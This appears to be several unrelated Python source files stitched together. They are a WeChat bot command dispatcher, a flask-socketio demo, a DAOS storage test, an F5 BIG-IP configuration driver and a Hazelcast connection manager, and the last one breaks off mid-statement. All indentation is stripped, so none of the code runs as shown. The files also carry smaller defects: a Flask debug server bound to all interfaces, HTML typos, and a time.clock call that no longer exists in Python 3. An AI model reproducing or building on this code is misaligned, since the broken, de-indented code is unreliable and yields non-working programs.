# if the previous session is not ended
if current_object is not None:
if current_object.finished:
del session_objects[from_user]
else:
if current_object.msg_handler(msg):
del session_objects[from_user]
return
# if this is really a command
if cmd[:1] == "/":
if len(cmd) > 1:
# parse the command and arguments
cmd = re.split(" +", cmd[1:])
if cmd[-1] == "":
del cmd[-1]
if cmd[0] == 'help':
if len(cmd) > 1:
if cmd[1][0] == '/':
mod = modules.get(cmd[1][1:])
else:
mod = modules.get(cmd[1])
if mod is not None:
mod.help(from_user)
else:
itchat.send_msg(
"Non-existent command name " + cmd[1] + "\nType /help to see all available commands",
from_user)
else:
keys = list(modules.keys())
keys.sort()
for module_name in keys:
modules[module_name].help_brief(from_user)
itchat.send_msg("Type /help [command] to get detailed instructions on a specific command",
from_user)
elif cmd[0] in modules.keys():
if len(session_objects.keys()) + len(session_processes.keys()) > 10:
itchat.send_msg('Too many people sending commands. Please try again later.', from_user)
return
mod = modules[cmd[0]]
# interaction required -> create a new object to handle message
if mod.interactive:
try:
session_objects[from_user] = mod(from_user, mod.parse_args(from_user, cmd[1:]))
itchat.send_msg("Type /q to quit", from_user)
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
# no interaction -> static method call
else:
# fast_execution -> call in the main thread
if mod.fast_execution:
try:
mod.call(from_user, mod.parse_args(from_user, cmd[1:]))
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
# fast_execution -> create a new process
else:
try:
session_processes[from_user] = [
Process(target=mod.call, args=(from_user, mod.parse_args(from_user, cmd[1:]),)),
cmd[0]]
session_processes[from_user][0].start()
itchat.send_msg("Type /q to stop", from_user)
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
else:
itchat.send_msg("\n".join(["Non-existent command {}".format("/" + cmd[0]),
"Type /help to see all available commands",
"Type /help [command] to get detailed instructions on a specific command"]),
from_user)
else:
itchat.send_msg("\n".join(["Error: Empty command body.",
"Type /help to see all available commands",
"Type /help [command] to get detailed instructions on a specific command"]),
from_user)
@itchat.msg_register([PICTURE, RECORDING, ATTACHMENT, VIDEO])
def file_listener(file):
global session_objects
from_user = file['FromUserName']
if session_objects.get(from_user) is not None:
if session_objects[from_user].finished or session_objects[from_user].file_handler(file):
del session_objects[from_user]
itchat.auto_login(hotReload=True, enableCmdQR=terminal_QR)
itchat.run(True)
|
run_bad.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
from flask import Flask, request
from sio_server import socketio
from sio_client import get_ws_client
app = Flask(__name__)
socketio.init_app(app)
app.socketio = socketio
index_tmpl_str = '''
<!DOCUMENT html>
<html>
<head>
<meta charset="uff-8" />
<title>flask socketio demo</title>
</head>
<body>
<div>please watch server response at console of web browser(you can press F12)</div>
<!-- socket.io cdn -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.4/socket.io.slim.js"></script>
<script type="text/javascript">
var namespace = '/test';
var ws_url = [location.protocol, '//', document.domain, ':', location.port, namespace].join('');
var socket = io.connect(ws_url, {
path: '/ws/'
});
socket.on('send_log', function(message) {
console.log(message);
});
</script>
</body>
</html>
'''
@app.route("/")
def view_index():
return index_tmpl_str
def send_msg(msg):
# TODO: your code
ws_cfg = {
'host': '127.0.0.1',
'port': 5000,
'resource': 'ws'
}
ws_client = get_ws_client(ws_cfg)
print('before emit')
ws_client.emit('write_task_log', 'msg: ' + msg, path='/test')
print('after emit')
# import time; time.sleep(3)
ws_client.disconnect('/test') # specify path because of emit
@app.route("/task")
def view_task():
msg = request.values.get('msg', 'empty msg')
send_msg(msg)
return 'send task ok'
def thread_func():
print('before sleep')
for i in range(1, 6):
time.sleep(1)
print('sleep [', i, '/ 5]')
print('after sleep')
send_msg('msg')
print('after send msg')
@app.route("/thread")
def view_thread():
print('before thread')
thread = Thread(target=thread_func)
thread.start()
print('after thread')
return 'thread executed ok'
if __name__ == '__main__':
cfg = {
'host': '0.0.0.0',
'port': 5000,
'debug': True
}
print('visit by [http://{0}:{1}]'.format(cfg['host'], cfg['port']))
socketio.run(app, **cfg)
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import traceback
from apricot import TestWithServers
import check_for_pool
from pydaos.raw import DaosPool, DaosContainer, DaosApiError
from test_utils_pool import TestPool
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share pool
handles among processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
def check_handle(self, buf_len, iov_len, buf, uuidstr, rank):
"""
This gets run in a child process and verifyes the global
handle can be turned into a local handle in another process.
"""
pool = DaosPool(self.context)
pool.set_uuid_str(uuidstr)
pool.set_svc(rank)
pool.group = "daos_server"
# note that the handle is stored inside the pool as well
dummy_local_handle = pool.global2local(self.context, iov_len,
buf_len, buf)
# perform some operations that will use the new handle
pool.pool_query()
container = DaosContainer(self.context)
container.create(pool.handle)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=all,pool,pr,tiny,poolglobalhandle
"""
# initialize a python pool object then create the underlying
# daos storage
self.pool = TestPool(self.context, dmg_command=self.get_dmg_command())
self.pool.get_params(self)
self.pool.create()
self.pool.connect()
try:
# create a container just to make sure handle is good
self.container = DaosContainer(self.context)
self.container.create(self.pool.pool.handle)
# create a global handle
iov_len, buf_len, buf = self.pool.pool.local2global()
# this should work in the future but need on-line server addition
#arg_list = (buf_len, iov_len, buf, pool.get_uuid_str(), 0)
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
self.check_handle(buf_len, iov_len, buf,
self.pool.pool.get_uuid_str(), 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
bigipconfigdriver.py
|
#!/usr/bin/env python
# Copyright (c) 2016-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import fcntl
import hashlib
import json
import logging
import os
import os.path
import signal
import sys
import threading
import time
import traceback
import pyinotify
from urllib.parse import urlparse
from f5_cccl.api import F5CloudServiceManager
from f5_cccl.exceptions import F5CcclError
from f5_cccl.utils.mgmt import mgmt_root
from f5_cccl.utils.profile import (delete_unused_ssl_profiles,
create_client_ssl_profile,
create_server_ssl_profile)
log = logging.getLogger(__name__)
console = logging.StreamHandler()
console.setFormatter(
logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s"))
root_logger = logging.getLogger()
root_logger.addHandler(console)
class ResponseStatusFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("RESPONSE::STATUS")
class CertFilter(logging.Filter):
def filter(self, record):
return "CERTIFICATE" not in record.getMessage()
class KeyFilter(logging.Filter):
def filter(self, record):
return "PRIVATE KEY" not in record.getMessage()
root_logger.addFilter(ResponseStatusFilter())
root_logger.addFilter(CertFilter())
root_logger.addFilter(KeyFilter())
DEFAULT_LOG_LEVEL = logging.INFO
DEFAULT_VERIFY_INTERVAL = 30.0
NET_SCHEMA_NAME = 'cccl-net-api-schema.yml'
class CloudServiceManager():
"""CloudServiceManager class.
Applies a configuration to a BigIP
Args:
bigip: ManagementRoot object
partition: BIG-IP partition to manage
"""
def __init__(self, bigip, partition, user_agent=None, prefix=None,
schema_path=None):
"""Initialize the CloudServiceManager object."""
self._mgmt_root = bigip
self._schema = schema_path
self._cccl = F5CloudServiceManager(
bigip,
partition,
user_agent=user_agent,
prefix=prefix,
schema_path=schema_path)
def mgmt_root(self):
""" Return the BIG-IP ManagementRoot object"""
return self._mgmt_root
def get_partition(self):
""" Return the managed partition."""
return self._cccl.get_partition()
def get_schema_type(self):
"""Return 'ltm' or 'net', based on schema type."""
if self._schema is None:
return 'ltm'
elif 'net' in self._schema:
return 'net'
def _apply_ltm_config(self, config):
"""Apply the ltm configuration to the BIG-IP.
Args:
config: BIG-IP config dict
"""
return self._cccl.apply_ltm_config(config)
def _apply_net_config(self, config):
"""Apply the net configuration to the BIG-IP."""
return self._cccl.apply_net_config(config)
def get_proxy(self):
"""Called from 'CCCL' delete_unused_ssl_profiles"""
return self._cccl.get_proxy()
class IntervalTimerError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class IntervalTimer(object):
def __init__(self, interval, cb):
float(interval)
if 0 >= interval:
raise IntervalTimerError("interval must be greater than 0")
if not cb or not callable(cb):
raise IntervalTimerError("cb must be callable object")
self._cb = cb
self._interval = interval
self._execution_time = 0.0
self._running = False
self._timer = None
self._lock = threading.RLock()
def _set_execution_time(self, start_time, stop_time):
if stop_time >= start_time:
self._execution_time = stop_time - start_time
else:
self._execution_time = 0.0
def _adjust_interval(self):
adjusted_interval = self._interval - self._execution_time
if adjusted_interval < 0.0:
adjusted_interval = 0.0
self._execution_time = 0.0
return adjusted_interval
def _run(self):
start_time = time.clock()
try:
self._cb()
except Exception:
log.exception('Unexpected error')
finally:
with self._lock:
stop_time = time.clock()
self._set_execution_time(start_time, stop_time)
if self._running:
self.start()
def is_running(self):
return self._running
def start(self):
with self._lock:
if self._running:
# restart timer, possibly with a new interval
self.stop()
self._timer = threading.Timer(self._adjust_interval(), self._run)
# timers can't be stopped, cancel just prevents the callback from
# occuring when the timer finally expires. Make it a daemon allows
# cancelled timers to exit eventually without a need for join.
self._timer.daemon = True
self._timer.start()
self._running = True
def stop(self):
with self._lock:
if self._running:
self._timer.cancel()
self._timer = None
self._running = False
class ConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def create_ltm_config(partition, config):
"""Extract a BIG-IP configuration from the LTM configuration.
Args:
config: BigIP config
"""
ltm = {}
if 'resources' in config and partition in config['resources']:
ltm = config['resources'][partition]
return ltm
def create_network_config(config):
"""Extract a BIG-IP Network configuration from the network config.
Args:
config: BigIP config which contains vxlan defs
"""
net = {}
if 'vxlan-fdb' in config:
net['userFdbTunnels'] = [config['vxlan-fdb']]
if ('vxlan-arp' in config and 'arps' in config['vxlan-arp']
and config['vxlan-arp']['arps'] is not None):
net['arps'] = config['vxlan-arp']['arps']
log.debug("NET Config: %s", json.dumps(net))
return net
def _create_custom_profiles(mgmt, partition, custom_profiles):
incomplete = 0
# Server profiles may reference a CA cert in another server profile.
# These need to be loaded first.
for profile in custom_profiles:
caFile = profile.get('caFile', '')
if profile['context'] == 'serverside' and caFile == "self":
incomplete += create_server_ssl_profile(mgmt, partition, profile)
for profile in custom_profiles:
if profile['context'] == 'clientside':
incomplete += create_client_ssl_profile(mgmt, partition, profile)
elif profile['context'] == 'serverside':
caFile = profile.get('caFile', '')
if caFile != "self":
incomplete += create_server_ssl_profile(
mgmt, partition, profile)
else:
log.error(
"Only client or server custom profiles are supported.")
return incomplete
def _delete_unused_ssl_profiles(mgr, partition, config):
return delete_unused_ssl_profiles(mgr, partition, config)
class ConfigHandler():
def __init__(self, config_file, managers, verify_interval):
self._config_file = config_file
self._managers = managers
self._condition = threading.Condition()
self._thread = threading.Thread(target=self._do_reset)
self._pending_reset = False
self._stop = False
self._backoff_time = 1
self._backoff_timer = None
self._max_backoff_time = 128
self._verify_interval = verify_interval
self._interval = IntervalTimer(self._verify_interval,
self.notify_reset)
self._thread.start()
def stop(self):
self._condition.acquire()
self._stop = True
self._condition.notify()
self._condition.release()
if self._backoff_timer is not None:
self.cleanup_backoff()
def notify_reset(self):
self._condition.acquire()
self._pending_reset = True
self._condition.notify()
self._condition.release()
def _do_reset(self):
log.debug('config handler thread start')
with self._condition:
while True:
self._condition.acquire()
if not self._pending_reset and not self._stop:
self._condition.wait()
log.debug('config handler woken for reset')
self._pending_reset = False
self._condition.release()
if self._stop:
log.info('stopping config handler')
if self._backoff_timer is not None:
self.cleanup_backoff()
break
start_time = time.time()
incomplete = 0
try:
config = _parse_config(self._config_file)
# If LTM is not disabled and
# No 'resources' indicates that the controller is not
# yet ready -- it does not mean to apply an empty config
if not _is_ltm_disabled(config) and \
'resources' not in config:
continue
incomplete = self._update_cccl(config)
except ValueError:
formatted_lines = traceback.format_exc().splitlines()
last_line = formatted_lines[-1]
log.error('Failed to process the config file {} ({})'
.format(self._config_file, last_line))
incomplete = 1
except Exception:
log.exception('Unexpected error')
incomplete = 1
if incomplete:
# Error occurred, perform retries
self.handle_backoff()
else:
if (self._interval and self._interval.is_running()
is False):
self._interval.start()
self._backoff_time = 1
if self._backoff_timer is not None:
self.cleanup_backoff()
perf_enable = os.environ.get('SCALE_PERF_ENABLE')
if perf_enable: # pragma: no cover
test_data = {}
app_count = 0
backend_count = 0
for service in config['resources']['test'][
'virtualServers']:
app_count += 1
backends = 0
for pool in config['resources']['test']['pools']:
if service['name'] in pool['name']:
backends = len(pool['members'])
break
test_data[service['name']] = backends
backend_count += backends
test_data['Total_Services'] = app_count
test_data['Total_Backends'] = backend_count
test_data['Time'] = time.time()
json_data = json.dumps(test_data)
log.info('SCALE_PERF: Test data: %s',
json_data)
log.debug('updating tasks finished, took %s seconds',
time.time() - start_time)
if self._interval:
self._interval.stop()
def _update_cccl(self, config):
_handle_vxlan_config(config)
cfg_net = create_network_config(config)
incomplete = 0
for mgr in self._managers:
partition = mgr.get_partition()
cfg_ltm = create_ltm_config(partition, config)
try:
# Manually create custom profiles;
# CCCL doesn't yet do this
if 'customProfiles' in cfg_ltm and \
mgr.get_schema_type() == 'ltm':
tmp = 0
tmp = _create_custom_profiles(
mgr.mgmt_root(),
partition,
cfg_ltm['customProfiles'])
incomplete += tmp
# Apply the BIG-IP config after creating profiles
# and before deleting profiles
if mgr.get_schema_type() == 'net':
incomplete += mgr._apply_net_config(cfg_net)
else:
incomplete += mgr._apply_ltm_config(cfg_ltm)
# Manually delete custom profiles (if needed)
if mgr.get_schema_type() == 'ltm':
_delete_unused_ssl_profiles(
mgr,
partition,
cfg_ltm)
except F5CcclError as e:
# We created an invalid configuration, raise the
# exception and fail
log.error("CCCL Error: %s", e.msg)
incomplete += 1
return incomplete
def cleanup_backoff(self):
"""Cleans up canceled backoff timers."""
self._backoff_timer.cancel()
self._backoff_timer.join()
self._backoff_timer = None
def handle_backoff(self):
"""Wrapper for calls to retry_backoff."""
if (self._interval and self._interval.is_running() is
True):
self._interval.stop()
if self._backoff_timer is None:
self.retry_backoff()
def retry_backoff(self):
"""Add a backoff timer to retry in case of failure."""
def timer_cb():
self._backoff_timer = None
self.notify_reset()
self._backoff_timer = threading.Timer(
self._backoff_time, timer_cb
)
log.error("Error applying config, will try again in %s seconds",
self._backoff_time)
self._backoff_timer.start()
if self._backoff_time < self._max_backoff_time:
self._backoff_time *= 2
class ConfigWatcher(pyinotify.ProcessEvent):
def __init__(self, config_file, on_change):
basename = os.path.basename(config_file)
if not basename or 0 == len(basename):
raise ConfigError('config_file must be a file path')
self._config_file = config_file
self._on_change = on_change
self._config_dir = os.path.dirname(self._config_file)
self._config_stats = None
if os.path.exists(self._config_file):
try:
self._config_stats = self._digest()
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
self._running = False
self._polling = False
self._user_abort = False
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
self._user_abort = True
self._running = False
def _loop_check(self, notifier):
if self._polling:
log.debug('inotify loop ended - returning to polling mode')
return True
else:
return False
def loop(self):
self._running = True
if not os.path.exists(self._config_dir):
log.info(
'configured directory doesn\'t exist {}, entering poll loop'.
format(self._config_dir))
self._polling = True
while self._running:
try:
while self._polling:
if self._polling:
if os.path.exists(self._config_dir):
log.debug('found watchable directory - {}'.format(
self._config_dir))
self._polling = False
break
else:
log.debug('waiting for watchable directory - {}'.
format(self._config_dir))
time.sleep(1)
_wm = pyinotify.WatchManager()
_notifier = pyinotify.Notifier(_wm, default_proc_fun=self)
_notifier.coalesce_events(True)
mask = (pyinotify.IN_CREATE | pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO |
pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVE_SELF |
pyinotify.IN_DELETE_SELF)
_wm.add_watch(
path=self._config_dir,
mask=mask,
quiet=False,
exclude_filter=lambda path: False)
log.info('entering inotify loop to watch {}'.format(
self._config_file))
_notifier.loop(callback=self._loop_check)
if (not self._polling and _notifier._fd is None):
log.info('terminating')
self._running = False
except Exception as e:
log.warning(e)
if self._user_abort:
log.info('Received user kill signal, terminating.')
def _digest(self):
sha = hashlib.sha256()
with open(self._config_file, 'rb') as f:
fcntl.lockf(f.fileno(), fcntl.LOCK_SH, 0, 0, 0)
while True:
buf = f.read(4096)
if not buf:
break
sha.update(buf)
fcntl.lockf(f.fileno(), fcntl.LOCK_UN, 0, 0, 0)
return sha.digest()
def _should_watch(self, pathname):
if pathname == self._config_file:
return True
return False
def _is_changed(self):
changed = False
cur_hash = None
if not os.path.exists(self._config_file):
if cur_hash != self._config_stats:
changed = True
else:
changed = False
else:
try:
cur_hash = self._digest()
if cur_hash != self._config_stats:
changed = True
else:
changed = False
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
return (changed, cur_hash)
def process_default(self, event):
if (pyinotify.IN_DELETE_SELF == event.mask or
pyinotify.IN_MOVE_SELF == event.mask):
log.warn(
'watchpoint {} has been moved or destroyed, using poll loop'.
format(self._config_dir))
self._polling = True
if self._config_stats is not None:
log.debug('config file {} changed, parent gone'.format(
self._config_file))
self._config_stats = None
self._on_change()
if self._should_watch(event.pathname):
(changed, sha) = self._is_changed()
if changed:
log.debug('config file {0} changed - signalling bigip'.format(
self._config_file, self._config_stats, sha))
self._config_stats = sha
self._on_change()
def _parse_config(config_file):
def _file_exist_cb(log_success):
if os.path.exists(config_file):
if log_success:
log.info('Config file: {} found'.format(config_file))
return (True, None)
else:
return (False, 'Waiting for config file {}'.format(config_file))
_retry_backoff(_file_exist_cb)
with open(config_file, 'r') as config:
fcntl.lockf(config.fileno(), fcntl.LOCK_SH, 0, 0, 0)
data = config.read()
fcntl.lockf(config.fileno(), fcntl.LOCK_UN, 0, 0, 0)
config_json = json.loads(data)
log.debug('loaded configuration file successfully')
return config_json
def _handle_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--config-file',
type=str,
required=True,
help='BigIp configuration file')
parser.add_argument(
'--ctlr-prefix',
type=str,
required=True,
help='Controller name prefix'
)
args = parser.parse_args()
basename = os.path.basename(args.config_file)
if not basename or 0 == len(basename):
raise ConfigError('must provide a file path')
args.config_file = os.path.realpath(args.config_file)
return args
def _handle_global_config(config):
level = DEFAULT_LOG_LEVEL
verify_interval = DEFAULT_VERIFY_INTERVAL
if config and 'global' in config:
global_cfg = config['global']
if 'log-level' in global_cfg:
log_level = global_cfg['log-level']
try:
level = logging.getLevelName(log_level.upper())
except (AttributeError):
log.warn('The "global:log-level" field in the configuration '
'file should be a string')
if 'verify-interval' in global_cfg:
try:
verify_interval = float(global_cfg['verify-interval'])
if verify_interval < 0:
verify_interval = DEFAULT_VERIFY_INTERVAL
log.warn('The "global:verify-interval" field in the '
'configuration file should be a non-negative '
'number')
except (ValueError):
log.warn('The "global:verify-interval" field in the '
'configuration file should be a number')
vxlan_partition = global_cfg.get('vxlan-partition')
try:
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
except:
level = DEFAULT_LOG_LEVEL
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
log.warn('Undefined value specified for the '
'"global:log-level" field in the configuration file')
# level only is needed for unit tests
return verify_interval, level, vxlan_partition
def _handle_bigip_config(config):
if (not config) or ('bigip' not in config):
raise ConfigError('Configuration file missing "bigip" section')
bigip = config['bigip']
if 'username' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:username" section')
if 'password' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:password" section')
if 'url' not in bigip:
raise ConfigError('Configuration file missing "bigip:url" section')
if ('partitions' not in bigip) or (len(bigip['partitions']) == 0):
raise ConfigError('Configuration file must specify at least one '
'partition in the "bigip:partitions" section')
url = urlparse(bigip['url'])
host = url.hostname
port = url.port
if not port:
port = 443
return host, port
def _handle_vxlan_config(config):
if config and 'vxlan-fdb' in config:
fdb = config['vxlan-fdb']
if 'name' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:name" section')
if 'records' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:records" section')
if config and 'vxlan-arp' in config:
arp = config['vxlan-arp']
if 'arps' not in arp:
raise ConfigError('Configuration file missing '
'"vxlan-arp:arps" section')
def _set_user_agent(prefix):
try:
with open('/app/vendor/src/f5/VERSION_BUILD.json', 'r') \
as version_file:
data = json.load(version_file)
user_agent = \
prefix + "-bigip-ctlr-" + data['version'] + '-' + data['build']
except Exception as e:
user_agent = prefix + "-bigip-ctlr-VERSION-UNKNOWN"
log.error("Could not read version file: %s", e)
return user_agent
def _retry_backoff(cb):
RETRY_INTERVAL = 1
log_interval = 0.5
elapsed = 0.5
log_success = False
while 1:
if log_interval > 0.5:
log_success = True
(success, val) = cb(log_success)
if success:
return val
if elapsed == log_interval:
elapsed = 0
log_interval *= 2
log.error("Encountered error: {}. Retrying for {} seconds.".format(
val, int(log_interval)
))
time.sleep(RETRY_INTERVAL)
elapsed += RETRY_INTERVAL
def _find_net_schema():
paths = [path for path in sys.path if 'site-packages' in path]
for path in paths:
for root, dirs, files in os.walk(path):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
for root, dirs, files in os.walk('/app/src/f5-cccl'):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
log.info('Could not find CCCL schema: {}'.format(NET_SCHEMA_NAME))
return ''
def _is_ltm_disabled(config):
try:
return config['global']['disable-ltm']
except KeyError:
return False
def main():
try:
args = _handle_args()
config = _parse_config(args.config_file)
verify_interval, _, vxlan_partition = _handle_global_config(config)
host, port = _handle_bigip_config(config)
# FIXME (kenr): Big-IP settings are currently static (we ignore any
# changes to these fields in subsequent updates). We
# may want to make the changes dynamic in the future.
# BIG-IP to manage
def _bigip_connect_cb(log_success):
try:
bigip = mgmt_root(
host,
config['bigip']['username'],
config['bigip']['password'],
port,
"tmos")
if log_success:
log.info('BIG-IP connection established.')
return (True, bigip)
except Exception as e:
return (False, 'BIG-IP connection error: {}'.format(e))
bigip = _retry_backoff(_bigip_connect_cb)
# Read version and build info, set user-agent for ICR session
user_agent = _set_user_agent(args.ctlr_prefix)
managers = []
if not _is_ltm_disabled(config):
for partition in config['bigip']['partitions']:
# Management for the BIG-IP partitions
manager = CloudServiceManager(
bigip,
partition,
user_agent=user_agent)
managers.append(manager)
if vxlan_partition:
# Management for net resources (VXLAN)
manager = CloudServiceManager(
bigip,
vxlan_partition,
user_agent=user_agent,
prefix=args.ctlr_prefix,
schema_path=_find_net_schema())
managers.append(manager)
handler = ConfigHandler(args.config_file,
managers,
verify_interval)
if os.path.exists(args.config_file):
handler.notify_reset()
watcher = ConfigWatcher(args.config_file, handler.notify_reset)
watcher.loop()
handler.stop()
except (IOError, ValueError, ConfigError) as e:
log.error(e)
sys.exit(1)
except Exception:
log.exception('Unexpected error')
sys.exit(1)
return 0
if __name__ == "__main__":
main()
|
connection.py
|
import io
import logging
import random
import struct
import threading
import time
import uuid
from hazelcast import six, __version__
from hazelcast.config import ReconnectMode
from hazelcast.core import AddressHelper, CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.errors import (
AuthenticationError,
TargetDisconnectedError,
HazelcastClientNotActiveError,
InvalidConfigurationError,
ClientNotAllowedInClusterError,
IllegalStateError,
ClientOfflineError,
)
from hazelcast.future import ImmediateFuture, ImmediateExceptionFuture
from hazelcast.invocation import Invocation
from hazelcast.lifecycle import LifecycleState
from hazelcast.protocol.client_message import (
SIZE_OF_FRAME_LENGTH_AND_FLAGS,
Frame,
InboundMessage,
ClientMessageBuilder,
)
from hazelcast.protocol.codec import client_authentication_codec, client_ping_codec
from hazelcast.util import AtomicInteger, calculate_version, UNKNOWN_VERSION
_logger = logging.getLogger(__name__)
_INF = float("inf")
class _WaitStrategy(object):
def __init__(self, initial_backoff, max_backoff, multiplier, cluster_connect_timeout, jitter):
self._initial_backoff = initial_backoff
self._max_backoff = max_backoff
self._multiplier = multiplier
self._cluster_connect_timeout = cluster_connect_timeout
self._jitter = jitter
self._attempt = None
self._cluster_connect_attempt_begin = None
self._current_backoff = None
if cluster_connect_timeout == _INF:
self._cluster_connect_timeout_text = "INFINITE"
else:
self._cluster_connect_timeout_text = "%.2fs" % self._cluster_connect_timeout
def reset(self):
self._attempt = 0
self._cluster_connect_attempt_begin = time.time()
self._current_backoff = min(self._max_backoff, self._initial_backoff)
def sleep(self):
self._attempt += 1
time_passed = time.time() - self._cluster_connect_attempt_begin
if time_passed > self._cluster_connect_timeout:
_logger.warning(
"Unable to get live cluster connection, cluster connect timeout (%s) is reached. "
"Attempt %d.",
self._cluster_connect_timeout_text,
self._attempt,
)
return False
# random between (-jitter * current_backoff, jitter * current_backoff)
sleep_time = self._current_backoff + self._current_backoff * self._jitter * (
2 * random.random() - 1
)
sleep_time = min(sleep_time, self._cluster_connect_timeout - time_passed)
_logger.warning(
"Unable to get live cluster connection, retry in %.2fs, attempt: %d, "
"cluster connect timeout: %s, max backoff: %.2fs",
sleep_time,
self._attempt,
self._cluster_connect_timeout_text,
self._max_backoff,
)
time.sleep(sleep_time)
self._current_backoff = min(self._current_backoff * self._multiplier, self._max_backoff)
return True
class _AuthenticationStatus(object):
AUTHENTICATED = 0
CREDENTIALS_FAILED = 1
SERIALIZATION_VERSION_MISMATCH = 2
NOT_ALLOWED_IN_CLUSTER = 3
class ConnectionManager(object):
"""ConnectionManager is responsible for managing ``Connection`` objects."""
def __init__(
self,
client,
config,
reactor,
address_provider,
lifecycle_service,
partition_service,
cluster_service,
invocation_service,
near_cache_manager,
):
self.live = False
self.active_connections = {} # uuid to connection, must be modified under the _lock
self.client_uuid = uuid.uuid4()
self._client = client
self._config = config
self._reactor = reactor
self._address_provider = address_provider
self._lifecycle_service = lifecycle_service
self._partition_service = partition_service
self._cluster_service = cluster_service
self._invocation_service = invocation_service
self._near_cache_manager = near_cache_manager
self._smart_routing_enabled = config.smart_routing
self._wait_strategy = self._init_wait_strategy(config)
self._reconnect_mode = config.reconnect_mode
self._heartbeat_manager = _HeartbeatManager(
self, self._client, config, reactor, invocation_service
)
self._connection_listeners = []
self._connect_all_members_timer = None
self._async_start = config.async_start
self._connect_to_cluster_thread_running = False
self._shuffle_member_list = config.shuffle_member_list
self._lock = threading.RLock()
self._connection_id_generator = AtomicInteger()
self._labels = frozenset(config.labels)
self._cluster_id = None
self._load_balancer = None
def add_listener(self, on_connection_opened=None, on_connection_closed=None):
"""Registers a ConnectionListener.
If the same listener is registered multiple times, it will be notified multiple times.
Args:
on_connection_opened (function): Function to be called when a connection is opened. (Default value = None)
on_connection_closed (function): Function to be called when a connection is removed. (Default value = None)
"""
self._connection_listeners.append((on_connection_opened, on_connection_closed))
def get_connection(self, member_uuid):
return self.active_connections.get(member_uuid, None)
def get_random_connection(self, should_get_data_member=False):
if self._smart_routing_enabled:
connection = self._get_connection_from_load_balancer(should_get_data_member)
if connection:
return connection
# We should not get to this point under normal circumstances
# for the smart client. For uni-socket client, there would be
# a single connection in the dict. Therefore, copying the list
# should be acceptable.
for member_uuid, connection in list(six.iteritems(self.active_connections)):
if should_get_data_member:
member = self._cluster_service.get_member(member_uuid)
if not member or member.lite_member:
continue
return connection
return None
def start(self, load_balancer):
if self.live:
return
self.live = True
self._load_balancer = load_balancer
self._heartbeat_manager.start()
self._connect_to_cluster()
def shutdown(self):
if not self.live:
return
self.live = False
if self._connect_all_members_timer:
self._connect_all_members_timer.cancel()
self._heartbeat_manager.shutdown()
# Need to create copy of connection values to avoid modification errors on runtime
for connection in list(six.itervalues(self.active_connections)):
connection.close("Hazelcast client is shutting down", None)
self.active_connections.clear()
del self._connection_listeners[:]
def connect_to_all_cluster_members(self, sync_start):
if not self._smart_routing_enabled:
return
if sync_start:
for member in self._cluster_service.get_members():
try:
self._get_or_connect_to_member(member).result()
except:
pass
self._start_connect_all_members_timer()
def on_connection_close(self, closed_connection):
remote_uuid = closed_connection.remote_uuid
remote_address = closed_connection.remote_address
if not remote_address:
_logger.debug(
"Destroying %s, but it has no remote address, hence nothing is "
"removed from the connection dictionary",
closed_connection,
)
return
with self._lock:
connection = self.active_connections.get(remote_uuid, None)
disconnected = False
removed = False
if connection == closed_connection:
self.active_connections.pop(remote_uuid, None)
removed = True
_logger.info(
